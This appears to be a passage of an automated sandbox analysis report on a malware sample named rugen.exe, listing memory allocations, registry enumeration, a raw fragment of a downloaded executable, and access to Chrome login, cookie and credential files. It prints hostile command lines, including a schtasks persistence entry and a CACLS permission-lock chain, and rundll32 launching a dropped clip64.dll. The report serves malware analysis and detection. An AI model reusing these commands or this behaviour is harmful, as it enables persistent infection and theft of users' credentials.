region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description rugen.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 2425626
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425626
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425505
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425505
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425372
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425372
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\f1361037.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\g4371292.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\x4523285.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\i2714208.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\h2521172.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x1857949.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
file C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
file C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL­O‰dà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj8hÌ<¹ˆhè#h`êèl*YÃÌÌÌj8hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj8hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8h=¹Ðhè¿"h€ëè *YÃÌÌÌj0hD=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00086e00', u'virtual_address': u'0x0000c000', u'entropy': 7.893667516953585, u'name': u'.rsrc', u'virtual_size': u'0x00087000'} entropy 7.89366751695 description A section with a high entropy has been found
entropy 0.943181818182 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x0000029c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: 7-Zip
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

 regkey_r: AddressBook
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: Adobe AIR
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExW

 regkey_r: Connection Manager
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: DirectDrawEx
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: EditPlus
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: Fontcore
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: Google Chrome
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: Haansoft HWord 80 Korean
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: IE40
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: IE4Data
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: IE5BAKEX
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: IEData
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: MobileOptionPack
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

 regkey_r: Office15.PROPLUSR
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR
1 0 0

RegOpenKeyExW

 regkey_r: SchedulingAgent
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: WIC
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
1 0 0

RegOpenKeyExW

 regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
1 0 0

RegOpenKeyExW

 regkey_r: {4A03706F-666A-4037-7777-5F2748764D10}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
1 0 0

RegOpenKeyExW

 regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0015-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0016-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0018-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0019-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001A-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001B-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-040C-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-002C-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0044-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-006E-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0090-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00A1-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00E1-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00E2-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0115-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0117-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-012B-0409-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {91150000-0011-0000-0000-0000000FF1CE}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

 regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

 regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

 regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561}
base_handle: 0x0000029c
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
1 0 0
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
wmi SELECT * FROM Win32_Processor
